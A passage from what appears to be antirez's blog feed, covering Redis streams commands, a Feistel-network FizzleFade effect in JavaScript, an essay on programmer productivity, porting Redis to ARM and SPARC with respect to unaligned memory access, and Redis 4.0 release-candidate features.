3) "temperature"
4) "10.5"
2) 1) 1506872463535.0
2) 1) "foo"
2) "10"

Here we are reasoning in terms of ranges of IDs, however you can use XRANGE in order to get a specific range of elements in a given time range, because you can omit the “sequence” part of the IDs. So what you can do is to just specify times in milliseconds. The following means: “Give me 10 entries starting from the Unix time 1506872463”:

127.0.0.1:6379> XRANGE mystream 1506872463000 + COUNT 10
1) 1) 1506872463535.0
2) 1) "foo"
2) "10"
2) 1) 1506872463535.1
2) 1) "bar"
2) "20"

A final important thing to note about XRANGE is that, given that we receive the IDs in the reply, and the immediately successive ID is trivially obtained just incrementing the sequence part of the ID, it is possible to use XRANGE to incrementally iterate the whole stream, receiving for every call the specified number of elements. After the *SCAN family of commands in Redis, that allowed iteration of Redis data structures *despite* the fact they were not designed for being iterated, I avoided to make the same error again.

Streaming with XREAD: blocking for new data
===========================================

XRANGE is perfect when we want to access our stream to get ranges by ID or time, or single elements by ID. However in the case of streams that different clients must consume as data arrives, this is not good enough and would require some form of pooling (that could be a good idea for *certain* applications that just connect from time to time to get data).

The XREAD command is designed in order to read, at the same time, from multiple streams just specifying the ID of the last entry in the stream we got. Moreover we can request to block if no data is available, to be unblocked when data arrives. Similarly to what happens with blocking list operations, but here data is not consumed from the stream, and multiple clients can access the same data at the same time.

This is a canonical example of XREAD call:

> XREAD BLOCK 5000 STREAMS mystream otherstream $ $

And it means: get data from “mystream” and “otherstream”. If no data is available, block the client, with a timeout of 5000 milliseconds. After the STREAMS option we specify the keys we want to listen for, and the last ID we have. However a special ID of “$” means: assume I’ve all the elements that there are in the stream right now, so give me just starting from the next element arriving.

If, from another client, I send the commnad:

> XADD otherstream * message “Hi There”

This is what happens on the XREAD side:

1) 1) "otherstream"
2) 1) 1) 1506935385635.0
2) 1) "message"
2) "Hi There"

We get the key that received data, together with the data received. In the next call, we’ll likely use the ID of the last message received:

> XREAD BLOCK 5000 STREAMS mystream otherstream $ 1506935385635.0

And so forth. However note that with this usage pattern, it is possible that the client will connect again after a very big delay (because it took time to process messages, or for any other reason). In such a case, in the meantime, a lot of messages could pile up, so it is wise to always use the COUNT option with XREAD, in order to make sure the client will not be flooded with messages and the server will not have to lose too much time just serving tons of messages to a single client.

Capped streams
==============

So far so good… however streams at some point have to remove old messages. Fortunately this is possible with the MAXLEN option of the XADD command:

> XADD mystream MAXLEN 1000000 * field1 value1 field2 value2

This basically means, if the stream, after adding the new element is found to have more than 1 million messages, remove old messages so that the length returns back to 1 million elements. It’s just like using RPUSH + LTRIM with lists, but this time we have a built-in mechanism to do so. However note that the above means that every time we add a new message, we have also to incur in the work needed in order to remove a message from the other side of the stream. This takes some CPU, so it is possible to use the “~” symbol before the count in MAXLEN, in order to specify that we are not really demanding *exactly* 1 million messages, but if there are a few more it’s not a big problem:

> XADD mystream MAXLEN ~ 1000000 * foo bar

This way XADD will remove messages only when it can remove a whole node. This will make having the capped stream almost for free compared to vanilla XADD.

Consumer groups (work in progress)
==================================

This is the first of the features that is not already implemented in Redis, but is a work in progress. It is also the idea more clearly inspired by Kafka, even if implemented here in a pretty different way. The gist is that with XREAD, clients can also add a “GROUP ” option. Automatically all the clients in the same group will get *different* messages. Of course there could be multiple groups reading from the same stream, in such cases all groups will receive duplicates of the same messages arriving in the stream, but within each group, messages will not be repeated.

An extension to groups is that it will be possible to specify a “RETRY ” option when groups are specified: in this case, if messages are not acknowledged for processing with XACK, they will be delivered again after the specified amount of milliseconds. This provides some best effort reliability to the delivering of the messages, in case the client has no private means to mark messages as processed. This part is a work in progress as well.

Memory usage and saving loading times
=====================================

Because of the design used to model Redis streams, the memory usage is remarkably low. It depends on the number of fields, values, and their lengths, but for simple messages we are at a few millions of messages for every 100 MB of used memory. Moreover, the format is conceived to need very minimal serialization: the listpack blocks that are stored as radix tree nodes, have the same representation on disk and in memory, so they are trivially stored and read. For instance Redis can read 5 million entries from the RDB file in 0.3 seconds.
This makes replication and persistence of streams very efficient.

It is planned to also allow deletion of items in the middle. This is only partially implemented, but the strategy is to mark entries as deleted in the entry flag, and when a given ratio between entries and deleted entires is reached, the block is rewritten to collect the garbage, and if needed it is glued to another adjacent block in order to avoid fragmentation.

Conclusions end ETA
===================

Redis streams will be part of Redis stable in the 4.0 series before the end of the year. I think that this general purpose data structure is going to put a huge patch in order for Redis to cover a lot of use cases that were hard to cover: that means that you had to be creative in order to abuse the current data structures to fix certain problems. One very important use case is time series, but my feeling is that also streaming of messages for other use cases via TREAD is going to be very interesting both as replacement for Pub/Sub applications that need more reliability than fire-and-forget, and for completely new use cases. For now, if you want to start to evaluate the new capabilities in the context of your problems, just fetch the “streams” branch at Github and start playing. After all bug reports are welcome :-)

If you like videos, a real-time session showing streams is here: https://www.youtube.com/watch?v=ELDzy9lCFHQ Comments]]>
http://antirez.com/news/114
Doing the FizzleFade effect using a Feistel network http://antirez.com/news/113 http://antirez.com/news/113 Tue, 29 Aug 2017 14:35:14 +0000
You may wonder why the original code used a LFSR or why I'm proposing a different approach, instead of the vanilla setPixel(rand(),rand()): doing this with a pseudo random generator, as noted in the blog post, is slow, but is also visually very unpleasant, since the more red pixels you have on the screen already, the less likely is that you hit a new yet-not-red pixel, so the final pixels take forever to turn red (I *bet* that many readers of this blog post tried it in the old times of the Spectum, C64, or later with QBASIC or GWBasic). In the final part of the blog post the author writes:

"Because the effect works by plotting pixels individually, it was hard to replicate when developers tried to port the game to hardware accelerated GPU. None of the ports managed to replicate the fizzlefade except Wolf4SDL, which found a LFSR taps configuration to reach resolution higher than 320x200.”

While not rocket science, it was possibly hard for other resolutions to find a suitable LFSR. However regardless of the real complexity of finding an appropriate LFSR for other resolutions, the authors of the port could use another technique, called a Feistel Network, to get exactly the same result in a trivial way.

What is a Feistel Network?
===

It’s a building block typically used in cryptography: it creates a transformation between a sequence of bits and another sequence of bits, so that the transformation is always invertible, even if you use all the kind of non linear transformations inside the Feistel network. In practical terms the Feistel network can, for example, translate a 32 bit number A into another 32 bit number B, according to some function F(), so that you can always go from B to A later. Because the function is invertible, it implies that for every input value the Feistel network generates *a different* output value.

This is a simple Feistel network in pseudo code:

Split the input into L and R halves (Example: L = INPUT & 0xFF, R = INPUT >> 8)
REPEAT for N rounds:
next_L = R
R = L XOR F(R)
L = next_L
END
RETURN the value composing L and R again into a single sequence of bits: R<<8 | L

So we basically split a (for example) 16 bit integer into two 8 bit integers L and R, perform some transformation for N rounds, and recompose them back into a 16 bit integer, which is our output.

But how is this useful for our problem of implementing FizzleFade? Well you can imagine your 2D screen like a linear array of pixels. If the resolution is 320x200 like in the original game you have from pixel 0 to pixel 63999. So for every integer from 0 to 63999 we can generate a random looking pixel position just by counting and setting the pixel in the position returned by the Feistel network. The problem is that the Feistel network works in bits, so we can’t have exactly from 0 to 63999, we have to pick a power of two which is large enough. The nearest is 16 in this case: with 16 bits we have 65536 integer-to-integer transformations, a few cycles will not be used to set an actual pixel but is not a big waste.

So, this is how our Feistel network looks like, in Javascript:

/* Transforms the 16 bit input into another seemingly psenduo random number
* in the same range. Every input 16 bit input will generate a different
* 16 bit output. This is called a Feistel network. */
function feistelNet(input) {
var l = input & 0xff;
var r = input >> 8;
for (var i = 0; i < 8; i++) {
var nl = r;
var F = (((r * 11) + (r >> 5) + 7 * 127) ^ r) & 0xff;
r = l ^ F;
l = nl;
}
return ((r<<8)|l)&0xffff;
}

The non linear transformation “F” I’m using is just a few random multiplications and shifts, picked mostly at random.
I’m using 8 rounds even if it is probably not needed with a better F function, but I want the effect to look random (coincidentally drawing random pixels is a decent way to visually spot trivial bad distribution properties).

Implementing this using a Javascript canvas we need a few more functions, to get a 2D context and set a pixel.

The final code is in this Gist: https://gist.github.com/antirez/6d58860b221a6ae5622ced8ccdddbe47

You can see the result here: http://antirez.com/misc/fizzlefade.html

The original problem to explore in this article was to find a way to implement the effect in different resolutions, so even if it is a trivial extension of the 320x200 case, just to make an example, imagine you want to implement the same with 1024*768. There are 786432 pixels, so 2^20 will fit quite well with 1048576 possible integers. We’ll have to modify the Feistel network to have 20 bits input/output by using 10 bits L and R variables, otherwise everything is pretty much the same, but remember to also change the stop condition (that checks the number of frames).

Actually Feistel networks one-to-one pseudo random mapping properties are very useful in other contexts as well. For instance I used it in my radix tree implementation tests (https://github.com/antirez/rax in case you are curious). A good tool to have in a programmer mental box. Comments]]>
http://antirez.com/news/113
The mythical 10x programmer http://antirez.com/news/112 http://antirez.com/news/112 Tue, 28 Feb 2017 11:08:42 +0000
The programming community is extremely polarized about the existence or not of such a beast: who says there is no such a thing as the 10x programmer, who says it actually does not just exist, but there are even 100x programmers if you know where to look for.

If you see programming as a “linear” discipline, it is clear that the 10x programmer looks like an irrational possibility. How can a runner run 10x faster than another one? Or a construction worker build 10x the things another worker can build in the same time? However programming is a design discipline, in a very special way. Even when a programmer does not participate in the actual architectural design of a program, the act of implementing it still requires a sub-design of the implementation strategy.

So if the design and implementation of a program are not linear abilities, things like experience, coding abilities, knowledge, recognition of useless parts, are, in my opinion, not just linear advantages, they work together in a multiplicative way in the act of creating a program. Of course this phenomenon happens much more when a programmer can both handle the design and the implementation of a program. The more “goal oriented” is the task, the more a potential 10x programmer can exploit her/his abilities in order to reach the goal with a lot less efforts. When the task at hand is much more rigid, with specific guidelines about what tools to use and how to implement things, the ability of a 10x programmer to perform a lot of work in less time is weakened: it can still exploit “local” design possibilities to do a much better work, but cannot change in more profound ways the path used to reach the goal, that may include, possibly, even eliminating part of the specification completely from the project, so that the goal to be reached looks almost the same but the efforts to reach it are reduced by a big factor.

In twenty years of working as a programmer I observed other programmers working with me, as coworkers, guided by me in order to reach a given goal, providing patches to Redis and other projects. At the same time many people told me that they believe I’m a very fast programmer. Considering I’m far from being a workaholic, I’ll also use myself as a reference of coding things fast.

The following is a list of qualities that I believe make the most difference in programmers productivity.

* Bare programming abilities: getting sub-tasks done

One of the most obvious limits, or strengths, of a programmer is to deal with the sub-task of actually implementing part of a program: a function, an algorithm or whatever. Surprisingly the ability to use basic imperative programming constructs very efficiently in order to implement something is, in my experience, not as widespread as one may think. In a team sometimes I observed very incompetent programmers, that were not even aware of a simple sorting algorithm, to get more work done than graduated programmers that were in theory extremely competent but very poor in the practice of implementing solutions.

* Experience: pattern matching

By experience I mean the set of already explored solutions for a number of recurring tasks. An experienced programmer eventually knows how to deal with a variety of sub tasks. This avoids both a lot of design work, but especially, is an extremely powerful weapon against design errors, that are in turn among the biggest enemies of simplicity.

* Focus: actual time VS hypothetical time

The number of hours spent writing code is irrelevant without looking at the quality of the time. Lack of focus can be generated by internal and external factors. Internal factors are procrastination, lack of interest in the project at hand (you can’t be good doing things you do not love), lack of exercise / well-being, poor or little sleeping. External factors are frequent meetings, work environments without actual offices, coworkers interrupting often and so forth. It seems natural that trying to improve focus and to reduce interruptions is going to have a non marginal effect on the programming productivity. Sometimes in order to gain focus, extreme measures are needed. For instance I only read emails from time to time and do not reply to most of them.

* Design sacrifice: killing 5% to get 90%

Often complexity is generated when there is no willingness to recognized that a non fundamental goal of a project is accounting for a very large amount of design complexity, or is making another more important goal very hard to reach, because there is a design tension among a fundamental feature and a non fundamental one. It is very important for a designer to recognize all the parts of a design that are not easy wins, that is, there is no proportionality between the effort and the advantages. A project that is executed in order to maximize the output, is going to focus exactly on the aspects that matter and that can be implemented in a reasonable amount of time. For example when designing Disque, a message broker, at some point I realized that by providing just best-effort ordering for the messages, all the other aspects of the project could be substantially improved: availability, query language and clients interaction, simplicity and performances.

* Simplicity

This is an obvious point that means all and nothing. In order to understand what simplicity is, it is worth to check how complexity is often generated. I believe that the two main drivers of complexity are the unwillingness to perform design sacrifices, and the accumulation of errors in the design activity.

If you think at the design process, each time a wrong path is pursued, we get more and more far from the optimal solution. An initial design error, in the wrong hands, will not generate a re-design of the same system, but will lead to the design of another complex solution in order to cope with the initial error. The project, thus, becomes more complex and less efficient at every wrong step.

The way simplicity can be achieved is to reason in terms of small metal “proof of concepts”, so that a large amount of simple designs can be explored in the mind of the programmer, to start working from something that looks the most viable and direct solution. Later, experience and personal design abilities will allow to improve the design and find sensible solutions for the sub-designs that need to be resolved.

However each time a complex solution is needed, it’s important to reason for a long time about how the complexity can be avoided, and only continue in that direction if no better possibility is found even considering completely different alternatives.

* Perfectionism, or how to kill your productivity and bias your designs

Perfectionism comes in two variants: an engineering culture of reaching the best possible measurable performance in a program, and as a personality trait. In both the instances, I see this as one of the biggest barriers for a programmer to deliver things fast. Perfectionism and fear of external judice insert a designing bias that will result in poor choices in order to refine a design only according to psychological or trivially measurable parameters, where things like robustness, simplicity, ability to deliver in time, are often never accounted for.

* Knowledge: some theory is going to help

When dealing with complex tasks, knowledge about data structures, fundamental limits of computation, non trivial algorithms that are very suitable to model certain tasks, are going to have an impact in the ability to find a suitable design. To be a super expert of everything is not required, but to be at least aware of a multitude of potential solutions for a problem certainly is. For instance applying design sacrifice (accept some error percentage) and being aware of probabilistic set cardinality estimators, can be combined together in order to avoid a complex, slow and memory inefficient solution in order to count unique items in a stream.

* Low level: understanding the machine

A number of issues in programs, even when using high level languages, arise from the misunderstanding of how the computer is going to perform a given task. This may even lead to the need of re-designing and re-implementing again from scratch a project because there is a fundamental problem in the tools or algorithms used. Good competence of C, the understanding of how CPUs work and clear ideas about how the kernel operates and how system calls are implemented, can save from bad late-stage surprises.

* Debugging skills

It is very easy to spend an enormous amount of work in order to find bugs. The sum of being good at gaining state about a bug, incrementally, in order to fix it with a rational set of steps, and the attitude of writing simple code that is unlikely to contain too many bugs, can have a great effect on the programmer efficiency.

It is no surprising to me to see how the above qualities of a programmer can have a 10x impact on the output. Combined they allow for good implementations of designs that start from a viable model and can be several times simpler than alternatives. There is a way to stress simplicity that I like to call “opportunistic programming”. Basically at every development step, the set of features to implement is chosen in order to have the maximum impact on the user base of the program, with the minimum requirement of efforts. Comments]]>
http://antirez.com/news/112
Redis on the Raspberry Pi: adventures in unaligned lands http://antirez.com/news/111 http://antirez.com/news/111 Fri, 24 Feb 2017 09:52:30 +0000
Well, I love to think that also Redis is a platform that programmers like to use when to hack, experiment, build new things. Moreover devices that can be used for embedded / IoT applications, often have the problem of temporarily or permanently storing data, for example received by sensors, on the device, to perform on-device computations or to send them to remote servers. Redis is adding a “Stream” data type that is specifically suited for streams of data and time series storage, at this point the specification is near complete and work to implement it will start in the next weeks. Redis existing data structures, and the new streams, together with the small memory footprint, the decent performances it can provide even while running on small hardware (and resulting low energy usage), looked like a good match for Raspberry Pi potential applications, and in general for small ARM devices. The missing piece was the obvious one: to run well on the Pi.

One of the many cool things about the Pi is that its development environment does not look like the embedded development environments of a few years ago… It just runs Linux, with all the Debian-alike tooling you expect to find. Basically adapting Redis to work on the Pi was not a huge task. The most fundamental mismatch a Linux system program and the Pi could have, is a performance / footprint mismatch, but this a non issue because of the Redis design itself: an empty instance consumes a total of 1MB of Resident Set Size, serves queries from memory, so it is fast enough and does not stress the flash disk too much, and when persistence is needed, it uses AOF which has an append-only write pattern. However the Pi runs an ARM processor, and this requires some care when dealing with unaligned accesses.

In this blog post, while showing you what I did to make Redis and Raspberry Pi more happy together, I’ll try to provide an overview about dealing with architectures that do not handle unaligned accesses transparently as the x86 platform does.

A few things about ARM processors


The most interesting thing about porting Redis to ARM is that ARM processors are, or actually were… well, not big fans of unaligned memory accesses. If you live your life in high level programming, you may not know it, but many processor architectures were historically not able to load or store memory words in addresses not multiple of the word size. So if the word size is 4 bytes (in the case of a 32 bit processor), you may load or store a word at address 0x4, 0x8, and so forth, but not at address 0x7. The result is an exception sometimes, or an odd behavior some other time, depending on the CPU and its exact configuration.

Then the x86 processors family ruled the world and everybody kinda forgot about this issue (if not for dealing with SEE instructions and alike, but now even those instructions have unaligned variants). Oh well, initially forgetting about the issue is not really what happened. Even if x86 processors could deal with unaligned accesses without raising an exception, doing so was a non trivial performance penalty: partial reads/writes at word boundary required to do the double of the work. But then recent x86 processors have optimizations that make unaligned accesses as fast as aligned accesses most of the times, so basically nowadays for x86 this is really Not An Issue.

ARM was, up to ARM v5, one of that platforms where unaligned accesses caused strange results, and very unexpected ones, actually. From the ARM official documentation: “if the address is not a multiple of four, the LDR instruction returns a rotated result rather than performing a true unaligned word load. Generally, this rotation is not what the programmer expects.” Oh well *definitely* not what the programmer expects. However even the original Raspberry Pi had an ARM v6 processor. The v6, while incurring into performance penalty, is able to deal with word-sized unaligned accesses. However instructions that deal with multiple words will raise an exception, terminating the program with a signal bus, or asking for help by the kernel (as we’ll see later in more details). This means that Redis would not crash like crap immediately when running on the Pi, because most of the unaligned accesses performed by Redis were actually word-sized. However, from time to time, the compiler generated code to speedup the computation using multiple load/store instructions, or the Redis code itself tried to load/store 64 bit values from unaligned accesses. This normally would result into a crash, in theory, however Linux helps a bit in this regard.

Instead of crashing, ask the kernel!


The Linux kernel, when running on an ARM processor, is able to help user processes to work as expected even when they execute operations on unaligned addresses that are normally not supported by the CPU. The way this is performed is by registering an handler inside the kernel for such exceptions: the kernel will check the operation that failed, and will simulate it in a function, so that the final result is like if the processor executed it, and then will resume the “offending” process that will continue to run.

If you are into low level programming, this Linux kernel file is worth checking: http://lxr.free-electrons.com/source/arch/arm/mm/alignment.c

The actual behavior of the kernel when an unaligned access exception is raised by the CPU, is controlled by the file /proc/cpu/alignment:

$ cat /proc/cpu/alignment
User: 0
System: 12590 (ip6_datagram_recv_common_ctl+0xc8/0xd4 [ipv6])
Skipped: 0
Half: 0
Word: 0
DWord: 0
Multi: 12590
User faults: 2 (fixup)

As you can see there are separated counters for all the unaligned accesses that were corrected by the kernel, both in user space and in kernel space. In the above case 12590 accesses where corrected in kernel space. No user land process was corrected. Note that the “User faults” line shows the kernel configuration about what to do when an user space process performs an unaligned access that the CPU cannot handle: it can fix the problem, send a SIGBUS, or log the even in the kernel logs. This is controlled by single bits of an integer that can be written into /proc/cpu/alignment, so for instance in order to log (other than fix) user space unaligned accesses one can use “echo 3 > /proc/cpu/alignment” (bit 1 enables logging, bit 2 enables fixing).

My feeling is that the Linux kernel enabled such a feature not much since the kernel developers were concerned with the poor user space programmers that were not able to deal with unaligned memory accesses, but because the kernel itself does not always performs unaligned accesses as you can see from the “System” counter. So this was the simplest way to fix the Linux port on ARM instead of checking every single place of the code.

Given that Linux handles this transparently, one could be tempted to say, oh well… maybe there is nothing to fix here, Redis will just work as expected as long as we set /proc/cpu/alignment to fix things transparently. Actually this is not the case for two reasons:

1. When an unaligned access is performed and fixed by the kernel, this results in *very* slow execution. The speed penalty is much larger than, for example, the second memory access needed when doing unaligned work-sized accesses. While this only happens with multiple loads and stores instructions, it is still a shame that in certain conditions Redis would be much slower than needed.

2. The Linux kernel implementation of ARM misaligned accesses is not perfect. There is code that GCC will emit that contains instructions that are not handled well by Linux 4.4.34.

A trivial example is this one:

$ #include

int main(int argc, char **argv) {
int count = 1000;
char *buf = malloc(count*sizeof(double));
double sum = 0;
double *l = (double*) (buf+1);
while(count--) {
l++;
sum += *l;
}
return 0;
}

$ gcc foo.c -g -ggdb
$ ./a.out
Bus error

Even if the kernel configuration in my Pi is set to deal with unaligned accesses and fix them, still the program received a SIGBUS!
Let’s see where this happens with GDB:

$ gdb ./a.out
(gdb) run

Program received signal SIGBUS, Bus error.
0x00010484 in main (argc=1, argv=0xbefff3b4) at foo.c:10
10 sum += *l;

Well it’s in the inner loop when our non aligned double pointer is deferenced, as expected.
But we may want to check further what’s happening, checking the ARM instruction that generated the exception:

(gdb) x/i $pc
=> 0x10484 : vldr d6, [r11, #-20] ; 0xffffffec

The VLDR instruction is used in order to load an extension register from a memory location, and is used for floating point math. For some reason the Linux kernel implementation of unaligned accesses correction, is not able to handle this instruction (I guess the implementation is just not complete as it should). The “dmesg” command will indeed show that the instruction was not recognized by the function that fixes the unaligned accesses:

[317778.925569] Alignment trap: not handling instruction ed937b00 at [<00010480>]
[317778.925610] Unhandled fault: alignment exception (0x011) at 0x01cb8011

So, if the default C compiler in the Pi could emit code that the default Linux kernel could not handle, I really wanted Redis to be able to run without issues even when the kernel is configured for not fixing the unaligned accesses. This means that Redis on ARM should only perform word-sized unaligned accesses, the only ones that the CPU can handle transparently.

Fixing the bugs


Given that ARM deals well with most unaligned memory accesses, Redis appeared to be already working on the Pi, mostly. Especially since by default the kernel is configured to fix many of the unaligned accesses that are not supported. Even with the alignment fixing disabled, it still superficially worked. However running the tests revealed different crashes, especially in obvious areas like bit operations and hash functions.

The first thing now Redis does is to define USE_ALIGNED_ACCESS when compiled into architectures that don’t support unaligned accesses. Then it was just a matter of fixing the code in order to avoid the fast paths where unaligned accesses where performed, or replacing the pointers deferencing with memcpy() operations. You may think that using memcpy() is ways slower than deferencing a pointer, but things are much better than that: for a fixed size mecpy call like memcpy(src,dst,sizeof(uint64_t)) the compiler is smart enough to avoid calling the function. It will actually generate the fastest set of instructions that will do the trick even if the address is not aligned. For instance, in x86 processors, this function call will actually be translated into a single MOV instruction.

After those fixes Redis and my two Raspberries, one original model B, and a much faster Pi 3, started to be great friends: all tests passing, but one about generating call traces in crash reports (but I’m going to fix this one as well), and from time to time a few failures in the integration tests due to the slowness of the Pi to setup masters and slaves setups. However at this point my appetite for correctness was stimulated, I wanted some more alignment problems.

Let’s go the extra mile: SPARC


While I was working at fixing Redis for ARM, there was a parallel issue open in the Github repository about making Redis run well on Solaris/SPARC. Now SPARC is not as gentle as ARM, it is not able to deal with *any* unaligned access. I remembered this very well as during my first years of C programming I bought a very old SPARC station 4: big endian and not able to deal with unaligned accesses of any kind at the same time, it gave me some perspective on porting programs around. It’s a shame that after a few months of having it I spilled vodka on it, frying the motherboard forever, but I still have it in my parent’s house.

Solaris/SPARC deals with unaligned accesses are more complex than Linux/ARM: 32 bit unaligned accesses are always fixed by the kernel, while 64 bit unaligned accesses are handled by registering an user space trap, according to the compilation flags. The Sun Studio C compiler has specific options to control what happens in a very precise way, and even tools in order to easily detect and fix such unaligned accesses.

If non-word sized unaligned accesses were rare in Redis, you could expect word-sized unaligned accesses to be everywhere. But actually it was not the case, since up to Redis 3.0 I used to test and fix Redis with an OpenBSD/SPARC box from time to time. So the biggest problem was the function to hash keys. The original Redis string library, called SDS, had a fixed sized header, so accesses were always aligned while hashing keys. Starting with Redis 3.2 the SDS header is variable in size, so this is no longer the case. Moreover there were other new unaligned accesses here and there accumulated since the last time I tested Redis on SPARC a few years ago.

To fix the hash function I also switched to SipHash, so this is also a security fix for HashDoS attacks. However it’s worth to note that I’m currently using a SipHash variant with reduced number of C and D rounds: SipHash1-2. This was made in order to avoid an otherwise non trivial speed regression, however there should not be practical attacks against SipHash1-2 AFAIK, and anyway is for sure more secure than what we previously used, Murmurhash2, that is so weak in that regard that’s possible to generate seed-independent collisions.

The SipHash implementation I’m using is the reference one, modified a bit in order to simplify the code and to have a case insensitive variant.
It is designed in order to deal with unaligned accesses, and to be endian agnostic. The first time I see a well written reference implementation of an hash function perhaps…

The other SPARC fixes were greatly simplified by a kind Redis user that provided me with a Solaris/SPARC access. In the process of fixing the unaligned accesses I also tried to fix building and testing Redis in Solaris/SPARC, so this was a good portability improvement exercise in general. After this task was completed, Redis is finally “alignment safe” at least for the stand alone code. There is more work to do in the Cluster area.

Performances of Redis in the Raspberry Pi


Ok, back to the Pi :-) How fast is Redis running on such small hardware? Well, as there are more than one Pi model out there, there are multiple answers for this question. Redis on the Pi 3 is surprisingly fast. My benchmarks are performed via the loopback interface because Redis on the Pi will be mostly intended for local programs to write data to it, or to use it as a message bus for both IPC and for cloud-edge exchange of information (for cloud here I mean the central servers of an appliance, and for edge the local installation of an appliance). However it also runs well when accessed via the ethernet port.

On the Pi3, I get this numbers:

Test 1 : 5 millions writes with 1 million keys (even distribution among keys). No persistence, no pipelining. 28000 ops/sec.
Test 2: Like test 1 but with pipelining using groups of 8 operations: 80000 ops/sec.
Test 3: Like test 1 but with AOF enabled, fsync 1 sec: 23000 ops/sec
Test 4: Like test 3, but with an AOF rewrite in progress: 21000 ops/sec

Basically Redis on the Pi 3 looks fast enough for any use case. Consider that Redis is mostly single threaded, or double-threaded when it rewrites the AOF log, since there is another background process, so you can expect the above performances while, at the same time, other processes are running on the Pi. Bottom line is: the numbers does not mean we are saturating the Pi.

With the original model B things are *quite* different, those numbers are much lower, like 2000 ops/sec non pipelined, and 15000 ops/sec when pipelining is used. This huge gap looks to hint at very inefficient handling of syscalls like write and read that require a context switch. However they are still good enough numbers for most applications, since Redis is not going to serve external clients most of the times, and because when there is high-load data logging needed to be performed, pipelining is often simple to implement.

However right now I don’t have one of the most interesting (other than the Pi 3) devices to test, which is the Pi zero. It will be interesting to see the numbers that it can deliver. They should be better than the Model B I’m using.

Pi continuity


One thing I love about Redis running well on the Pi is that I’m excited about Raspberry to become, with things like the Pi zero, potentially the to-go platform for IoT products. I mean even finished products intended for the final user. I can’t stop thinking what I would like to do in the hardware space if I had time: sensors, displays, the GPIO port, and the very low price make it possible to build an hardware startup in a much simpler way compared to the past, and I love the idea that hackers around the world could now ship smart appliances of different kinds. I want to be somewhat part of this, even if marginally, providing a good Redis experience in the Pi (and in the future with Android and other ARM based systems). Redis has a good combination of low resource needs, append-only operations and data model suitable for both logging and in-device analysis of the data, in order to take actions based on historical events, so I really believe it can help in this space.

So starting from now the Raspberry Pi is for me one of the main target platforms for Redis, like the Linux servers originally were set as the Redis “standard”. In the next weeks I’ll continue with the fixes, that will all go into Redis 4.0. At the same time I’ll write a new section in the Redis official site with all the informations about Redis and the Pi: benchmarks in the different devices, good practices, and so forth.
Maybe in the future I’ll be also able to release proof of concept “agents” in order to use Redis as a data bus between the IoT devices and the cloud, allowing the device to just log data inside Redis, with the agent taking care of moving the data on the cloud when the link with the outside world works, and at the same time fetching commands for the device to execute and sending back replies. This will be even more interesting when the stream data structure will be available in Redis 4.2.

I would love hearing about applications where you see Redis going to help in embedded setups, and what I could do in order to make it better in this regard. Comments]]>
http://antirez.com/news/111
The first release candidate of Redis 4.0 is out http://antirez.com/news/110 http://antirez.com/news/110 Fri, 02 Dec 2016 17:25:58 +0000
It’s just that Redis 4.0 has a lot of things that Redis should have had since ages, in a different world where one developer can, like Ken The Warrior, duplicate itself in ten copies and start to code. But it does not matter how hard I try to learn about new vim shortcuts, still the duplicate-me thing is not in my chords.

But well, finally with 4.0 we got a lot of these stuff done… and here is the list of the big ones, with a few details and pointers to learn more.

1. Modules

As you probably already know Redis 4.0 got a modules system, and one that allows to do pretty fancy stuff like implementing new data types that are RDB/AOF persisted, create non blocking commands and so forth. The deal here is that all this is done with an higher level abstract API completely separated from the core, so the modules you write are going to work with new releases of Redis. Using modules I wrote Neural Redis, a neural network data type that can be trained inside Redis itself, and many people are doing very interesting stuff: there are new rate limiting commands (implemented in Rust!), Graph DBs on top of Redis, secondary indexes, time series modules, full text indexing, and a number of other stuff, and my feeling is that’s just the start.

This does not just allow Redis to grow and cover new things, while taking the core, if not minimal, just with things that are useful to most users at least, pretty generic things that many people need. But also has the potential to avoid for many tasks the problem of rewriting a networked server, even if the goal is to create something not related to Redis, databases, caching, or whatever Redis is. That is, you can just write a module to use the Redis “infrastructure”: the protocol, the clients people already wrote and so forth. So I’ve a good feeling about it, no pressure for the core, freedom for the users that want to do more crazy stuff.

2. Replication version 2

So, that’s going to be very useful in production from the POV of operations. At some point in the past we introduced what is known as “PSYNC”. It was a new master-slave protocol that allowed the master and the salve to continue from where they were, if the connection between the two broke. Before that, every single connection break in the replication link between master and slave would result into a full synchronization: generate an RDB file in the master, transfer it, load it in the slave, ok you know how this works. So PSYNC was like a real improvement. But not enough…

PSYNC was not good enough when there was a failover. If a slave is promoted to master, the slaves that replicated with the old master were not able to connect to the new promoted slave and PSYNC with it: a full resynchronization was needed. This is not great, and is not good for Redis Cluster as well. However fixing this required to do changes to the replication protocol, because I really wanted to make sure that partial resyncs where going to work after any possible topology change, as long as there was a common replication history among the instances.

So the first change needed was about how “chained replication” works, that is, slaves of slaves of slaves … How do they work? Like, A is the master, and we have something like that:

A —> B —> C —> D

So A is the master of B but B is the master of C and so forth. Before Redis 4.0 what was happening is that B received the replication protocol from A. The replication protocol is, normally, a stream of write commands. B acted as a master for C just doing, internally, what A was doing: at every write it was generating again a suitable replication protocol to pass to C, and so forth.

Now instead B just proxies, verbatim, what it receives from A to C, and C will do the same for D: given that all the sub slaves now receive an identical stream of bytes, they can “tag” a given history, and use the tag and the offset to always try to continue if they have something in common.

The master itself, when it is turned into a slave, is now able to PSYNC with the new master. And slaves can usually PSYNC with the master even after a “clean” restart, using the info inside the RDB file, that now stores the replication tags and offsets.

Details are more complex than that, in order to make it working well, but well the deal here is, don’t be annoyed by full resynchronizations if possible. And PSYNC v2 does this well apparently. Please try it and let me know if you are interested in this feature.

3. Cache eviction improvements

Ok about that I wrote a full article months ago: http://antirez.com/news/109. So going to give you just the TLDR. We now have LFU (Last Frequently Used), and all the other policies switched to a more robust, fast and precise implementation. So big news for caching use cases. Read the full article if you care about this stuff, there are tons of infos.

4. Non blocking DEL and FLUSHALL/FLUSHDB.

Code name “lazy freeing of objects”, but it’s a lame name for a neat feature. There is a new command called UNLINK that just deletes a key reference in the database, and does the actual clean up of the allocations in a separated thread, so if you use UNLINK instead of DEL against a huge key the server will not block. And even better with the ASYNC options of FLUSHALL and FLUSHDB you can do that for whole DBs or for all the data inside the instance, if you want. Combined with the new SWAPDB command, that swaps two Redis databases content, FLUSHDB ASYNC can be quite interesting. Once you, for instance, populated DB 1 with the new version of the data, you can SWAPDB 0 1 and FLUSHDB ASYNC the database with the old data, and create yet a newer version and reiterate. This is only possible now because flushing a whole DB is no longer blocking.

There are reasons why UNLINK is not the default for DEL. I know things… I can’t talk (**).

5. Mixed RDB-AOF persistence format.

